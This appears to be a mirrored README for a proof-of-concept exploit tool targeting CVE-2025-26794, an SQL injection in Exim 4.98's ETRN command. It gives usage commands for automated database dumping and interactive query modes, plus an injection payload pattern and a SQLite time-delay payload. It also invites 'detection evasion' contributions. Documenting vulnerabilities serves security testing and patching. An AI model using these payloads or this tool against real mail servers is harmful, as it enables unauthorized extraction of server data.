来源

关联漏洞

描述

SQL injection exploit for CVE-2025-26794 in Exim 4.98. Automated data extraction via time-based blind SQLi. For authorized penetration testing only.

介绍

# CVE-2025-26794: Exim ETRN SQL Injection Exploit

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-Educational-red)
![Status](https://img.shields.io/badge/status-PoC-orange)

A proof-of-concept exploit tool for CVE-2025-26794, demonstrating SQL injection vulnerability in Exim 4.98 mail server via the ETRN command when using SQLite DBM storage.

## ⚠️ Legal Disclaimer

**FOR AUTHORIZED SECURITY TESTING ONLY**

This tool is provided for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal under various laws including:
- Computer Fraud and Abuse Act (CFAA) in the United States
- Computer Misuse Act in the United Kingdom
- Similar legislation in other jurisdictions

**You must have explicit written authorization before testing any system you do not own.**

The authors and contributors assume no liability for misuse or damage caused by this tool.

## 📋 Vulnerability Overview

**CVE-2025-26794** is a SQL injection vulnerability in Exim 4.98 that occurs when:
- Exim is configured with SQLite DBM storage
- The ETRN command handler processes serialized data
- User-controlled input is insufficiently sanitized before SQL query construction

This vulnerability allows attackers to:
- Extract sensitive data from the mail server database
- Perform time-based blind SQL injection attacks
- Enumerate database structure (tables, columns, data)

### Affected Versions
- Exim 4.98 with SQLite DBM configuration

### Attack Vector
- Network-accessible SMTP service (typically port 25)
- No authentication required (ETRN command available pre-auth)

## 🚀 Features

- **Vulnerability Testing**: Automated check to confirm if target is vulnerable
- **Time-based Blind SQLi**: Uses SQLite time-delay techniques for data extraction
- **Binary Search Optimization**: Efficient character-by-character extraction
- **Automated Database Dump**: Extracts tables, columns, and sample data
- **Interactive Mode**: Execute custom SQL queries interactively
- **Multi-mode Operation**: Flexible extraction strategies

## 📦 Installation

### Requirements
- Python 3.6 or higher
- Network access to target SMTP server

### Setup

```bash
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# Install dependencies (none required - uses standard library only)
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py
```

## 💻 Usage

### Basic Syntax

```bash
python3 exploit.py <target> [options]
```

### Quick Examples

#### 1. Test if Target is Vulnerable
```bash
python3 exploit.py 192.168.1.10 --test-only
```

#### 2. Automated Database Dump
```bash
python3 exploit.py mail.example.com --auto-dump
```

#### 3. Interactive SQL Query Mode
```bash
python3 exploit.py 10.0.0.5 --interactive
```

#### 4. Extract Specific Table Structure
```bash
python3 exploit.py 192.168.1.10 --table users --columns
```

#### 5. Execute Custom SQL Query
```bash
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
```

### Command-Line Options

| Option | Description |
|--------|-------------|
| `host` | Target hostname or IP address (required) |
| `-p, --port` | SMTP port (default: 25) |
| `-t, --timeout` | Socket timeout in seconds (default: 30) |
| `--threshold` | Time delay threshold for detection (default: 0.8s) |
| `--test-only` | Only test vulnerability, no data extraction |
| `--auto-dump` | Automatically dump database structure and data |
| `--interactive` | Launch interactive SQL query console |
| `--table TABLE` | Target specific table for extraction |
| `--columns` | Extract column names (use with --table) |
| `--query QUERY` | Execute custom SQL query |

## 🔍 How It Works

### Attack Flow

1. **Connection**: Establishes SMTP connection to target server
2. **Baseline Measurement**: Sends normal ETRN command to measure response time
3. **Injection Test**: Sends time-delay SQL payload to confirm vulnerability
4. **Data Extraction**: Uses binary search with time-based blind SQLi to extract data character-by-character

### SQL Injection Payload Structure

```sql
ETRN #',1); <MALICIOUS_QUERY> /*
```

The payload exploits improper sanitization in the ETRN serialization handler, allowing SQL injection into SQLite queries.

### Time-Based Detection

Uses SQLite-specific time delay:
```sql
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
```

This creates a measurable delay (~1-2 seconds) when condition is true.

## 📊 Example Output

```
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email
```

## 🛡️ Mitigation

If you are running Exim 4.98 with SQLite DBM:

1. **Update Exim**: Upgrade to patched version (4.98.1 or later)
2. **Input Validation**: Implement strict ETRN command validation
3. **Parameterized Queries**: Use prepared statements for all database operations
4. **Firewall Rules**: Restrict SMTP access to trusted networks
5. **Disable ETRN**: If not needed, disable ETRN command in Exim configuration

## 🔧 Technical Details

### Binary Search Algorithm

The exploit uses binary search to efficiently extract characters:
- ASCII printable range: 32-126
- Average queries per character: ~7 (log₂ 94)
- Optimized for minimal network traffic

### SQLite Functions Used

- `unicode()`: Get ASCII value of character
- `substr()`: Extract substring from result
- `sqlite_master`: System table for schema enumeration
- `pragma_table_info()`: Column metadata extraction

## 📚 References

- **CVE Details**: [CVE-2025-26794](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26794)
- **Exim Security Advisory**: [Official Exim Advisory]
- **OWASP SQL Injection**: [OWASP Guide](https://owasp.org/www-community/attacks/SQL_Injection)

## 🤝 Contributing

Contributions are welcome for:
- Performance optimizations
- Additional extraction techniques
- Detection evasion methods
- Bug fixes and improvements

Please ensure all contributions include:
- Clear documentation
- Responsible disclosure guidelines
- Legal usage warnings

## 📝 License

This project is released for educational purposes only. Use responsibly and legally.

## 👤 Author

**XploitGh0st**

- GitHub: [@XploitGh0st](https://github.com/XploitGh0st)

## 🙏 Acknowledgments

- Exim development team for responsible vulnerability handling
- Security research community
- SQLite time-based injection technique researchers

## ⚖️ Responsible Disclosure

If you discover vulnerabilities using this tool:
1. Do not publicly disclose details immediately
2. Contact the vendor/maintainer privately
3. Allow reasonable time for patching (typically 90 days)
4. Follow coordinated disclosure guidelines

---

**Remember: With great power comes great responsibility. Use this tool ethically and legally.**

文件快照

 [4.0K]  /data/pocs/6f5a6068bb8b837613cca5cb63c91610194d0461
├── [ 15K]  exploit.py
├── [7.5K]  README.md
└── [ 457]  requirements.txt

0 directories, 3 files

备注